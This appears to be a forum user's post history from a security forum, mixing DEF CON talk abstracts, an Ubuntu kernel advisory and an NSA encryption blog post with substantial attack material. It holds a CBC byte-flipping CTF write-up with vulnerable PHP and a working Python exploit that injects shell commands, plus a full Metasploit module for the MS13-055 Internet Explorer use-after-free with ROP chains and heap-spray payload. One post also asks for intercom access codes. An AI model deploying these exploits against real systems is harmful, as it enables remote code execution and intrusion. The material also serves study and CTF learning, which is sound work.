Everything posted by Nytro

  1. STUPID. You do not prevent SQL Injection from .htaccess. This garbage: RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC,OR] cannot be called filtering! Besides preventing nothing and merely slowing the attacker down a little, it can also cause serious functionality problems. SQL Injection, like any other application-level security issue, is filtered in the web application itself!
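For illustration, here is a minimal sketch of what "filtering in the application" usually means in practice: a parameterized query. The snippet uses Python with sqlite3 purely as an example (the table and column names are made up); the same idea applies to PHP's PDO or mysqli prepared statements.

    import sqlite3

    def get_user(db_path, username):
        """Look up a user with a parameterized query instead of string concatenation."""
        conn = sqlite3.connect(db_path)
        try:
            cur = conn.cursor()
            # The driver passes the value separately from the SQL text, so input like
            # "' OR '1'='1" is treated as plain data, not as part of the query.
            cur.execute("SELECT id, name FROM users WHERE name = ?", (username,))
            return cur.fetchone()
        finally:
            conn.close()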
  2. I'd be happy enough if you told me the access codes for various intercoms
  3. Def Con 21 Presentation By Zoz - Hacking Driverless Vehicles - Video And Slides Description: Hacking Driverless Vehicles by Zoz Cannytrophic Design Are driverless vehicles ripe for the hacking? Autonomous and unmanned systems are already patrolling our skies and oceans and being tested on our streets and highways. All trends indicate these systems are at an inflection point that will show them rapidly becoming commonplace. It is therefore a salient time for a discussion of the capabilities and potential vulnerabilities of these systems. This session will be an informative and light-hearted look at the current state of civil driverless vehicles and what hackers or miscreants might do to mess with them. Topics covered will include common sensors, decision profiles and their potential failure modes that could be exploited. With this talk Zoz aims to both inspire unmanned vehicle fans to think about robustness to adversarial and malicious scenarios, and to give the paranoid false hope of resisting the robot revolution. He will also present details of how students can get involved in the ultimate sports events for robot hacking, the autonomous vehicle competitions. Zoz is a robotics interface designer and rapid prototyping specialist. He is a co-founder of Cannytrophic Design in Boston and CTO of BlueSky in San Francisco. As co-host of the Discovery Channel show 'Prototype This!' he pioneered urban pizza delivery with robotic vehicles, including the first autonomous crossing of an active highway bridge in the USA, and airborne delivery of life preservers at sea from an autonomous aircraft. He also hosts the annual AUVSI Foundation student autonomous robot competitions such as Roboboat and Robosub. For More information please visit : - Defcon.org Sursa: Def Con 21 Presentation By Zoz - Hacking Driverless Vehicles - Video And Slides
  4. Def Con 21 Presentation By Mudge - Unexpected Stories From A Hacker Inside The Government Description: Unexpected Stories From a Hacker Who Made it Inside the Government by Peiter Mudge Zatko Having had the opportunity to see things from within the hacker community and from a senior position in the DoD, Mudge has some enlightening stories to share, and is picking some of his favorites. He'll discuss Julian's story to him about US government involvement in the origins of Wikileaks, how the DoD accidentally caused Anonymous to target government systems, some of the ways in which the defense industrial base's poor security works financially in its favor, and cases where the government missed opportunities for positive outreach and understanding with this community. You'll probably recognize parts of these stories from the news, but there are origins and back stories that are lesser known, and that should make for a good story time. For More Information please visit : - Defcon.org Sursa: Def Con 21 Presentation By Mudge - Unexpected Stories From A Hacker Inside The Government
  5. New Kernel Vulnerabilities Affect Ubuntu 12.10 September 11th, 2013, 07:10 GMT · By Marius Nestor - Ubuntu 12.10 Canonical announced a few days ago that a kernel update is available for its Ubuntu 12.10 (Quantal Quetzal) Linux operating system, fixing eight vulnerabilities found in the Linux kernel packages. The following eight Linux kernel vulnerabilities affect Ubuntu 12.10 (Quantal Quetzal): CVE-2012-5374, CVE-2012-5375, CVE-2013-1060, CVE-2013-2140, CVE-2013-2232, CVE-2013-2234, CVE-2013-4162, and CVE-2013-4163. As usual, you can click on each one to see how it affects your system, or go here for in-depth descriptions, as it affects other Linux distributions as well. The security flaws can be fixed if you upgrade your system(s) to the linux-image-3.5.0-40 (3.5.0-40.62) package(s). For detailed instructions on how to upgrade your system, see the following link: https://wiki.ubuntu.com/Security/Upgrades. We inform everyone that Ubuntu 13.04, Ubuntu 12.04 LTS and Ubuntu 10.04 LTS also received kernel updates today. Don't forget to reboot your computer after the upgrade. Sursa: New Kernel Vulnerabilities Affect Ubuntu 12.10
  6. CBC Byte Flipping Attack - 101 Approach

As usual, there are some explanations of this attack out there (see the references at the end), but they require some background to be understood properly, so here I will describe step by step how to perform this attack.

Purpose of the attack: to change a byte in the plaintext by corrupting a byte in the ciphertext. Why? To bypass filters by adding malicious characters like a single quote, to elevate privileges by changing the ID of the user to Admin, or to cause any other consequence of changing the plaintext expected by an application.

Introduction

First of all, let's start by understanding how CBC (Cipher Block Chaining) works. A detailed explanation can be found here: Block cipher mode of operation - Wikipedia, the free encyclopedia. I will only explain what is needed to understand the attack.

Encryption process:
Plaintext: the data to be encrypted.
IV: a block of bits used to randomize the encryption and hence produce distinct ciphertexts even if the same plaintext is encrypted multiple times.
Key: used by symmetric encryption algorithms like AES, Blowfish, DES, Triple DES, etc.
Ciphertext: the encrypted data.

An important point here is that CBC works on fixed-length groups of bits called blocks. In this blog we will use blocks of 16 bytes each. Since I hate mathematical formulas, below are mine:

    Ciphertext-0 = Encrypt(Plaintext-0 XOR IV)               - first block only
    Ciphertext-N = Encrypt(Plaintext-N XOR Ciphertext-N-1)   - second and remaining blocks

Note: as you can see, the ciphertext of the previous block is used to generate the next one.

Decryption process:

    Plaintext-0 = Decrypt(Ciphertext-0) XOR IV               - first block only
    Plaintext-N = Decrypt(Ciphertext-N) XOR Ciphertext-N-1   - second and remaining blocks

Note: Ciphertext-N-1 is used to generate the plaintext of the next block; this is where the byte flipping attack comes into play. If we change one byte of Ciphertext-N-1, then when it is XORed with the next decrypted block we will get a different plaintext! You got it? Do not worry, we will see a detailed example below.

Example: CBC blocks of 16 bytes. Let's say we have this serialized plaintext:

    a:2:{s:4:"name";s:6:"sdsdsd";s:8:"greeting";s:20:"echo 'Hello sdsdsd!'";}

Our target is to change the number 6 at "s:6" to the number 7. The first thing we need to do is split the plaintext into 16-byte chunks:

    Block 1: a:2:{s:4:"name";
    Block 2: s:6:"sdsdsd";s:8    <--- target here
    Block 3: :"greeting";s:20
    Block 4: :"echo 'Hello sd
    Block 5: sdsd!'";}

So our target character is located in block 2, which means we need to change the ciphertext of block 1 in order to change the plaintext of the second block. A rule of thumb is that the byte you change in a ciphertext block will ONLY affect the byte at the same offset of the next plaintext block. Our target is at offset 2:

    [0] = s
    [1] = :
    [2] = 6

Therefore, we need to change the byte at offset 2 of the first ciphertext block. As you can see in the code below, at line 2 we get the ciphertext of the whole data, at line 3 we change the byte of block 1 at offset 2, and finally we call the decryption function.

    1. $v = "a:2:{s:4:\"name\";s:6:\"sdsdsd\";s:8:\"greeting\";s:20:\"echo 'Hello sdsdsd!'\";}";
    2. $enc = @encrypt($v);
    3. $enc[2] = chr(ord($enc[2]) ^ ord("6") ^ ord("7"));
    4. $b = @decrypt($enc);

After running this code we are able to change the number 6 to 7. But how did we change the byte to the value we wanted at line 3?
Based on the decryption process described above, we know that A = Decrypt(Ciphertext) is XORed with B = Ciphertext-N-1 to finally get C = 6. In other words:

    C = A XOR B

Here the only value we do not know is A (the block cipher decryption output), but thanks to XOR we can easily get it:

    A = B XOR C

And finally, A XOR B XOR C is equal to 0. With this formula we can set our own value by appending it to the XOR calculation: A XOR B XOR C XOR "7" will give us 7 in the plaintext at offset 2 of the second block. Below is the PHP source code so that you can replicate it:

[Code Starts Here]
    define('MY_AES_KEY', "abcdef0123456789");

    function aes($data, $encrypt) {
        $aes = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, '');
        $iv = "1234567891234567";
        mcrypt_generic_init($aes, MY_AES_KEY, $iv);
        return $encrypt ? mcrypt_generic($aes, $data) : mdecrypt_generic($aes, $data);
    }

    define('MY_MAC_LEN', 40);

    function encrypt($data) {
        return aes($data, true);
    }

    function decrypt($data) {
        $data = rtrim(aes($data, false), "\0");
        return $data;
    }

    $v = "a:2:{s:4:\"name\";s:6:\"sdsdsd\";s:8:\"greeting\";s:20:\"echo 'Hello sdsdsd!'\";}";
    echo "Plaintext before attack: $v\n";
    $b = array();
    $enc = array();
    $enc = @encrypt($v);
    $enc[2] = chr(ord($enc[2]) ^ ord("6") ^ ord("7"));
    $b = @decrypt($enc);
    echo "Plaintext AFTER attack : $b\n";
[Code Ends Here]

Try changing the char from "7" to "A" or something else to see how it works.

Exercise 2: Now that we understand how this attack works, let's do a more realistic exercise. Some weeks ago the CTF competition hosted by the Eindbazen team took place, and there was a Web 400 challenge called "Moo!". You can see all the details of this task in references 2 and 3 at the end of the blog; here I am just going to describe the final steps of breaking CBC. We were provided with the source code for analysis; below is the chunk that matters for this exercise.

Basically, you submit any text in the POST parameter "name" and the app responds with a Hello message with the submitted text concatenated at the end, but a few things happen before the message is printed back:

1. The POST "name" parameter is filtered by the PHP escapeshellarg() function (which mainly escapes single quotes to prevent injecting malicious commands), then stored in the Array->greeting field, and finally a cookie is created, encrypted with this value.
2. Then the content of the Array->greeting field is executed via the PHP passthru() function, which is used to execute system commands.
3. Finally, any time the page is accessed, if the cookie already exists, it is decrypted and its content executed via passthru(). Here is where our CBC attack will give us a different plaintext, as explained in the previous section.

So, I tried to inject the string below in the POST parameter "name":

    name = 'X' + ';cat *;#a'

I added the char "X", which is the one to be replaced with a single quote via the CBC byte flipping attack, then the command to be executed (;cat *;), and finally a "#", which is interpreted as a comment by the shell so that we do not get problems with the trailing single quote inserted by escapeshellarg(), and therefore our command gets executed successfully. After calculating the exact offset of the byte to be changed in the previous ciphertext block (offset 51), I executed the code below to inject a single quote:

    pos = 51
    val = chr(ord('X') ^ ord("'") ^ ord(cookie[pos]))
    exploit = cookie[0:pos] + val + cookie[pos + 1:]

I am altering the cookie since it holds the whole ciphertext.
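(As an aside, the flip itself can be packed into a small reusable helper. A minimal sketch in Python, with illustrative names; block indexing is 0-based, mirroring the example above where corrupting the first block rewrites the byte at the same offset of the second block.)

    def flip_byte(ciphertext, block_size, target_block, offset, known_byte, wanted_byte):
        """Corrupt the block before `target_block` (0-based) so that the byte at
        `offset` of `target_block` decrypts to `wanted_byte` instead of `known_byte`."""
        # Same offset, one block earlier: that is the byte XORed into the target
        # plaintext during CBC decryption.
        pos = (target_block - 1) * block_size + offset
        data = bytearray(ciphertext)
        data[pos] ^= known_byte ^ wanted_byte
        return bytes(data)

    # Mirroring the example: the '6' sits at offset 2 of the second block (index 1),
    # so we corrupt offset 2 of the first block.
    # forged = flip_byte(enc, 16, 1, 2, ord('6'), ord('7'))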
Finally, I got the result below. First, we can see (in yellow) that our "X" was successfully changed to a single quote in the second block, but since the first block was altered, it got garbage inserted (in green), which causes an error when trying to unserialize() the data (in red); therefore the app did not even try to execute our injection.

How to fix it? Basically, we need to play with our injected data until the garbage in the first block no longer causes any problem during unserialization. A way to get around it is to pad our malicious command with alphabetic chars. So we come up with this injection string, padded with multiple 'z' characters before and after:

    name = 'z'*17 + 'X' + ';cat *;#' + 'z'*16

After sending the string above, voila!!! unserialize() does not complain about the garbage received and our shell command is executed successfully!!!!

If you want to replicate this exercise, below in the Appendix section is the PHP code running on the server side and the Python script (slightly modified from code provided by Daniel from hardc0de.ru, thanks!!!) that performs the exploitation. Finally, I want to thank the guys behind the references mentioned below for writing those excellent blogs.

References:
1. CRYPTO #2: http://blog.gdssecurity.com/labs/tag/crypto
2. http://codezen.fr/2013/08/05/ebctf-2013-web400-cryptoaescbchmac-write-up/
3. http://hardc0de.ru/2013/08/04/ebctf-web400/

Enjoy it!

Appendix:

PHP code:

    ini_set('display_errors', 1);
    error_reporting(E_ALL);

    define('MY_AES_KEY', "abcdef0123456789");
    define('MY_HMAC_KEY', "1234567890123456");
    #define("FLAG","CENSORED");

    function aes($data, $encrypt) {
        $aes = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, '');
        $iv = mcrypt_create_iv(mcrypt_enc_get_iv_size($aes), MCRYPT_RAND);
        $iv = "1234567891234567";
        mcrypt_generic_init($aes, MY_AES_KEY, $iv);
        return $encrypt ? mcrypt_generic($aes, $data) : mdecrypt_generic($aes, $data);
    }

    define('MY_MAC_LEN', 40);

    function hmac($data) {
        return hash_hmac('sha1', $data, MY_HMAC_KEY);
    }

    function encrypt($data) {
        return aes($data . hmac($data), true);
    }

    function decrypt($data) {
        $data = rtrim(aes($data, false), "\0");
        $mac = substr($data, -MY_MAC_LEN);
        $data = substr($data, 0, -MY_MAC_LEN);
        return hmac($data) === $mac ? $data : null;
    }

    $settings = array();
    if (@$_COOKIE['settings']) {
        echo @decrypt(base64_decode($_COOKIE['settings']));
        $settings = unserialize(@decrypt(base64_decode($_COOKIE['settings'])));
    }

    if (@$_POST['name'] && is_string($_POST['name']) && strlen($_POST['name']) < 200) {
        $settings = array(
            'name' => $_POST['name'],
            'greeting' => ('echo ' . escapeshellarg("Hello {$_POST['name']}!")),
        );
        setcookie('settings', base64_encode(@encrypt(serialize($settings))));
        #setcookie('settings', serialize($settings));
    }

    $d = array();
    if (@$settings['greeting']) {
        passthru($settings['greeting']);
    } else {
        echo "What is your name?";
echo "input name='name' type='text'"; echo "input name='submit' type='submit' "; } Exploit: #!/usr/bin/pythonimport requests import sys import urllib from base64 import b64decode as dec from base64 import b64encode as enc url = 'http://192.168.184.133/ebctf/mine.php' def Test(x): t = "echo 'Hello %s!'" % x s = 'a:2:{s:4:"name";s:%s:"%s";s:8:"greeting";s:%s:"%s";}%s' % (len(x),x,len(t),t, 'X'*40) for i in xrange(0,len(s),16): print s[i:i+16] print '\n' def Pwn(s): global url s = urllib.quote_plus(enc(s)) req = requests.get(url, cookies = {'settings' : s}).content # if req.find('works') != -1: print req # else: # print '[-] FAIL' def GetCookie(name): global url d = { 'name':name, 'submit':'Submit' } h = requests.post(url, data = d, headers = {'Content-Type' : 'application/x-www-form-urlencoded'}).headers if h.has_key('set-cookie'): h = dec(urllib.unquote_plus(h['set-cookie'][9:])) #h = urllib.unquote_plus(h['set-cookie'][9:]) #print h return h else: print '[-] ERROR' sys.exit(0) #a:2:{s:4:"name";s:10:"X;cat *;#a";s:8:"greeting";s:24:"echo 'Hello X;cat *;#a!'";} #a:2:{s:4:"name"; #s:10:"X;cat *;#a #";s:8:"greeting" #;s:24:"echo 'Hel #lo X;cat *;#a!'" #;} #a:2:{s:4:"name";s:42:"zzzzzzzzzzzzzzzzzX;cat *;#zzzzzzzzzzzzzzzz";s:8:"greeting";s:56:"echo 'Hello zzzzzzzzzzzzzzzzzX;cat *;#zzzzzzzzzzzzzzzz!'";} #a:2:{s:4:"name"; #s:42:"zzzzzzzzzz #zzzzzzzX;cat *;# #zzzzzzzzzzzzzzzz #";s:8:"greeting" #;s:56:"echo 'Hel #lo zzzzzzzzzzzzz #zzzzX;cat *;#zzz #zzzzzzzzzzzzz!'" #;} #exploit = 'X' + ';cat *;#a' #Test case first, unsuccess exploit = 'z'*17 + 'X' + ';cat *;#' + 'z' *16 # Test Success #exploit = "______________________________________________________; cat *;#" #Test(exploit) cookie = GetCookie(exploit) pos = 100; #test case success #pos = 51; #test case first, unsuccess val = chr(ord('X') ^ ord("'") ^ ord(cookie[pos])) exploit = cookie[0:pos] + val + cookie[pos + 1:] Pwn(exploit) Posted by Danux at 12:24 PM Sursa: http://danuxx.blogspot.ro/2013/09/cbc-byte-flipping-attack-101-approach.html
  7. [h=1]MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free", 'Description' => %q{ In IE8 standards mode, it's possible to cause a use-after-free condition by first creating an illogical table tree, where a CPhraseElement comes after CTableRow, with the final node being a sub table element. When the CPhraseElement's outer content is reset by using either outerText or outerHTML through an event handler, this triggers a free of its child element (in this case, a CAnchorElement, but some other objects apply too), but a reference is still kept in function SRunPointer::SpanQualifier. This function will then pass on the invalid reference to the next functions, eventually used in mshtml!CElement::Doc when it's trying to make a call to the object's SecurityContext virtual function at offset +0x70, which results a crash. An attacker can take advantage of this by first creating an CAnchorElement object, let it free, and then replace the freed memory with another fake object. Successfully doing so may allow arbitrary code execution under the context of the user. This bug is specific to Internet Explorer 8 only. It was originally discovered by Orange Tsai at Hitcon 2013, but was silently patched in the July 2013 update. }, 'License' => MSF_LICENSE, 'Author' => [ 'Orange Tsai', # Original discovery, PoC 'Peter Vreugdenhil', # Joins the party (wtfuzz) 'sinn3r' # Joins the party ], 'References' => [ [ 'MSB', 'MS13-055' ], [ 'URL', 'https://speakerd.s3.amazonaws.com/presentations/0df98910d26c0130e8927e81ab71b214/for-share.pdf' ] ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Pivot' => 0x77c15ed5, # xchg eax, esp; ret 'Align' => 0x77c4d801 # add esp, 0x2c; ret } ], [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Pivot' => 0x7c348b05, # xchg eax, esp; ret 'Align' => 0x7C3445F8 # add esp, 0x2c; ret } ] ], 'Payload' => { 'BadChars' => "\x00" }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Privileged' => false, 'DisclosureDate' => "Jul 09 2013", 'DefaultTarget' => 0)) end def get_target(agent) return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' when '6.1' os_name = 'Windows 7' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? 
and t.name.include?(os_name)) return t end end nil end def get_payload(t, cli) rop = '' code = payload.encoded esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000 case t['Rop'] when :msvcrt # Stack adjustment # add esp, -3500 esp_align = "\x81\xc4\x54\xf2\xff\xff" print_status("Using msvcrt ROP") rop = [ 0x77c1e844, # POP EBP # RETN [msvcrt.dll] 0x77c1e844, # skip 4 bytes [msvcrt.dll] 0x77c4fa1c, # POP EBX # RETN [msvcrt.dll] 0xffffffff, 0x77c127e5, # INC EBX # RETN [msvcrt.dll] 0x77c127e5, # INC EBX # RETN [msvcrt.dll] 0x77c4e0da, # POP EAX # RETN [msvcrt.dll] 0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx) 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll] 0x77c34fcd, # POP EAX # RETN [msvcrt.dll] 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx) 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] 0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll] 0x77c3048a, # POP EDI # RETN [msvcrt.dll] 0x77c47a42, # RETN (ROP NOP) [msvcrt.dll] 0x77c46efb, # POP ESI # RETN [msvcrt.dll] 0x77c2aacc, # JMP [EAX] [msvcrt.dll] 0x77c3b860, # POP EAX # RETN [msvcrt.dll] 0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll] 0x77c12df9, # PUSHAD # RETN [msvcrt.dll] 0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll] ].pack("V*") else print_status("Using JRE ROP") rop = [ 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 0xfffffdff, # Value to negate, will become 0x00000201 (dwSize) 0x7c347f98, # RETN (ROP NOP) [msvcr71.dll] 0x7c3415a2, # JMP [EAX] [msvcr71.dll] 0xffffffff, 0x7c376402, # skip 4 bytes [msvcr71.dll] 0x7c351e05, # NEG EAX # RETN [msvcr71.dll] 0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll] 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] 0x7c344f87, # POP EDX # RETN [msvcr71.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x7c351eb1, # NEG EDX # RETN [msvcr71.dll] 0x7c34d201, # POP ECX # RETN [msvcr71.dll] 0x7c38b001, # &Writable location [msvcr71.dll] 0x7c347f97, # POP EAX # RETN [msvcr71.dll] 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] 0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll] # rop chain generated with mona.py ].pack("V*") end rop_payload = rop rop_payload << esp_align rop_payload << code rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt rop_payload end def junk rand_text_alpha(4).unpack("V")[0].to_i end def nop make_nops(4).unpack("V")[0].to_i end def get_html(t, p) js_pivot = Rex::Text.to_unescape([t['Pivot']].pack("V*")) js_payload = Rex::Text.to_unescape(p) js_align = Rex::Text.to_unescape([t['Align']].pack("V*")) js_junk = Rex::Text.to_unescape([junk].pack("V*")) q_id = Rex::Text.rand_text_alpha(1) html = %Q| <!DOCTYPE html> <HTML XMLNS:t ="urn:schemas-microsoft-com:time"> <head> <meta> <?IMPORT namespace="t" implementation="#default#time2"> </meta> </head> <script> #{js_mstime_malloc} window.onload = function() { var x = document.getElementById("#{q_id}"); x.outerText = ""; a = document.getElementById('myanim'); p = ''; for (i=0; i < 7; i++) { p += unescape("#{js_junk}"); } p += unescape("#{js_payload}"); fo = unescape("#{js_align}"); for (i=0; i < 28; i++) { if (i == 27) { fo += unescape("#{js_pivot}"); } else { fo += unescape("#{js_align}"); } } fo += p; mstime_malloc({shellcode:fo, heapBlockSize:0x68, objId:"myanim"}); } </script> <table> <tr> <div> <span> <q id='#{q_id}'> <a> <td></td> </a> </q> </span> </div> </tr> 
</table> <t:ANIMATECOLOR id="myanim"/> </html> | html end def on_request_uri(cli, request) agent = request.headers['User-Agent'] t = get_target(agent) if t p = get_payload(t, cli) html = get_html(t, p) print_status("Sending exploit...") send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) else print_error("Not a suitable target: #{agent}") send_not_found(cli) end end end Sursa: MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free
  8. [h=3]On the NSA[/h]Let me tell you the story of my tiny brush with the biggest crypto story of the year. A few weeks ago I received a call from a reporter at ProPublica, asking me background questions about encryption. Right off the bat I knew this was going to be an odd conversation, since this gentleman seemed convinced that the NSA had vast capabilities to defeat encryption. And not in a 'hey, d'ya think the NSA has vast capabilities to defeat encryption?' kind of way.No, he'd already established the defeating. We were just haggling over the details. Oddness aside it was a fun (if brief) set of conversations, mostly involving hypotheticals. If the NSA could do this, how might they do it? What would the impact be? I admit that at this point one of my biggest concerns was to avoid coming off like a crank. After all, if I got quoted sounding too much like an NSA conspiracy nut, my colleagues would laugh at me. Then I might not get invited to the cool security parties. All of this is a long way of saying that I was totally unprepared for today's bombshell revelations describing the NSA's efforts to defeat encryption. Not only does the worst possible hypothetical I discussed appear to be true, but it's true on a scale I couldn't even imagine. I'm no longer the crank. I wasn't even close to cranky enough. And since I never got a chance to see the documents that sourced the NYT/ProPublica story -- and I would give my right arm to see them -- I'm determined to make up for this deficit with sheer speculation. Which is exactly what this blog post will be. 'Bullrun' and 'Cheesy Name' If you haven't read the ProPublica/NYT or Guardian stories, you probably should. The TL;DR is that the NSA has been doing some very bad things. At a combined cost of $250 million per year, they include: Tampering with national standards (NIST is specifically mentioned) to promote weak, or otherwise vulnerable cryptography. Influencing standards committees to weaken protocols. Working with hardware and software vendors to weaken encryption and random number generators. Attacking the encryption used by 'the next generation of 4G phones'. Obtaining cleartext access to 'a major internet peer-to-peer voice and text communications system' (Skype?) Identifying and cracking vulnerable keys. Establishing a Human Intelligence division to infiltrate the global telecommunications industry. And worst of all (to me): somehow decrypting SSL connections. All of these programs go by different code names, but the NSA's decryption program goes by the name 'Bullrun' so that's what I'll use here. How to break a cryptographic system There's almost too much here for a short blog post, so I'm going to start with a few general thoughts. Readers of this blog should know that there are basically three ways to break a cryptographic system. In no particular order, they are: Attack the cryptography. This is difficult and unlikely to work against the standard algorithms we use (though there are exceptions like RC4.) However there are many complex protocols in cryptography, and sometimes they are vulnerable. Go after the implementation. Cryptography is almost always implemented in software -- and software is a disaster. Hardware isn't that much better. Unfortunately active software exploits only work if you have a target in mind. If your goal is mass surveillance, you need to build insecurity in from the start. That means working with vendors to add backdoors. Access the human side. 
Why hack someone's computer if you can get them to give you the key? Bruce Schneier, who has seen the documents, says that 'math is good', but that 'code has been subverted'. He also says that the NSA is 'cheating'. Which, assuming we can trust these documents, is a huge sigh of relief. But it also means we're seeing a lot of (2) and (3) here.

So which code should we be concerned about? Which hardware?

[Figure: SSL Servers by OS type. Source: Netcraft.]

This is probably the most relevant question. If we're talking about commercial encryption code, the lion's share of it uses one of a small number of libraries. The most common of these are probably the Microsoft CryptoAPI (and Microsoft SChannel) along with the OpenSSL library. Of the libraries above, Microsoft is probably due for the most scrutiny. While Microsoft employs good (and paranoid!) people to vet their algorithms, their ecosystem is obviously deeply closed-source. You can view Microsoft's code (if you sign enough licensing agreements) but you'll never build it yourself. Moreover they have the market share. If any commercial vendor is weakening encryption systems, Microsoft is probably the most likely suspect. And this is a problem because Microsoft IIS powers around 20% of the web servers on the Internet -- and nearly forty percent of the SSL servers! Moreover, even third-party encryption programs running on Windows often depend on CAPI components, including the random number generator. That makes these programs somewhat dependent on Microsoft's honesty. Probably the second most likely candidate is OpenSSL. I know it seems like heresy to imply that OpenSSL -- an open source and widely-developed library -- might be vulnerable. But at the same time it powers an enormous amount of secure traffic on the Internet, thanks not only to the dominance of Apache SSL, but also due to the fact that OpenSSL is used everywhere. You only have to glance at the FIPS CMVP validation lists to realize that many 'commercial' encryption products are just thin wrappers around OpenSSL. Unfortunately while OpenSSL is open source, it periodically coughs up vulnerabilities. Part of this is due to the fact that it's a patchwork nightmare originally developed by a programmer who thought it would be a fun way to learn Bignum division.* Part of it is because crypto is unbelievably complicated. Either way, there are very few people who really understand the whole codebase. On the hardware side (and while we're throwing out baseless accusations) it would be awfully nice to take another look at the Intel Secure Key integrated random number generators that most Intel processors will be getting shortly. Even if there's no problem, it's going to be an awfully hard job selling these internationally after today's news.

Which standards?

From my point of view this is probably the most interesting and worrying part of today's leak. Software is almost always broken, but standards -- in theory -- get read by everyone. It should be extremely difficult to weaken a standard without someone noticing. And yet the Guardian and NYT stories are extremely specific in their allegations about the NSA weakening standards. The Guardian specifically calls out the National Institute of Standards and Technology (NIST) for a standard they published in 2006.
Cryptographers have always had complicated feelings about NIST, and that's mostly because NIST has a complicated relationship with the NSA. Here's the problem: the NSA ostensibly has both a defensive and an offensive mission. The defensive mission is pretty simple: it's to make sure US information systems don't get pwned. A substantial portion of that mission is accomplished through fruitful collaboration with NIST, which helps to promote data security standards such as the Federal Information Processing Standards (FIPS) and NIST Special Publications. I said cryptographers have complicated feelings about NIST, and that's because we all know that the NSA has the power to use NIST for good as well as evil. Up until today there's been no real evidence of malice, despite some occasional glitches -- and compelling evidence that at least one NIST cryptographic standard could have contained a backdoor. But now maybe we'll have to re-evaluate that relationship. As utterly crazy as it may seem. Unfortunately, we're highly dependent on NIST standards, ranging from pseudo-random number generators to hash functions and ciphers, all the way to the specific elliptic curves we use in SSL/TLS. While the possibility of a backdoor in any of these components does seem remote, trust has been violated. It's going to be an absolute nightmare ruling it out. Which people? Probably the biggest concern in all this is the evidence of collaboration between the NSA and unspecified 'telecom providers'. We already know that the major US (and international) telecom carriers routinely assist the NSA in collecting data from fiber-optic cables. But all this data is no good if it's encrypted. While software compromises and weak standards can help the NSA deal with some of this, by far the easiest way to access encrypted data is to simply ask for -- or steal -- the keys. This goes for something as simple as cellular encryption (protected by a single key database at each carrier) all the way to SSL/TLS which is (most commonly) protected with a few relatively short RSA keys. The good and bad thing is that as the nation hosting the largest number of popular digital online services (like Google, Facebook and Yahoo) many of those critical keys are located right here on US soil. Simultaneously, the people communicating with those services -- i.e., the 'targets' -- may be foreigners. Or they may be US citizens. Or you may not know who they are until you scoop up and decrypt all of their traffic and run it for keywords. Which means there's a circumstantial case that the NSA and GCHQ are either directly accessing Certificate Authority keys** or else actively stealing keys from US providers, possibly (or probably) without executives' knowledge. This only requires a small number of people with physical or electronic access to servers, so it's quite feasible.*** The one reason I would have ruled it out a few days ago is because it seems so obviously immoral if not illegal, and moreover a huge threat to the checks and balances that the NSA allegedly has to satisfy in order to access specific users' data via programs such as PRISM. To me, the existence of this program is probably the least unexpected piece of all the news today. Somehow it's also the most upsetting. So what does it all mean? I honestly wish I knew. Part of me worries that the whole security industry will talk about this for a few days, then we'll all go back to our normal lives without giving it a second thought. I hope we don't, though. 
Right now there are too many unanswered questions to just let things lie. The most likely short-term effect is that there's going to be a lot less trust in the security industry. And a whole lot less trust for the US and its software exports. Maybe this is a good thing. We've been saying for years that you can't trust closed code and unsupported standards: now people will have to verify. Even better, these revelations may also help to spur a whole burst of new research and re-designs of cryptographic software. We've also been saying that even open code like OpenSSL needs more expert eyes. Unfortunately there's been little interest in this, since the clever researchers in our field view these problems as 'solved' and thus somewhat uninteresting. What we learned today is that they're solved all right. Just not the way we thought. Notes: * The original version of this post repeated a story I heard recently (from a credible source!) about Eric Young writing OpenSSL as a way to learn C. In fact he wrote it as a way to learn Bignum division, which is way cooler. Apologies Eric! ** I had omitted the Certificate Authority route from the original post due to an oversight -- thanks to Kenny Patterson for pointing this out -- but I still think this is a less viable attack for passive eavesdropping (that does not involve actively running a man in the middle attack). And it seems that much of the interesting eavesdropping here is passive. *** The major exception 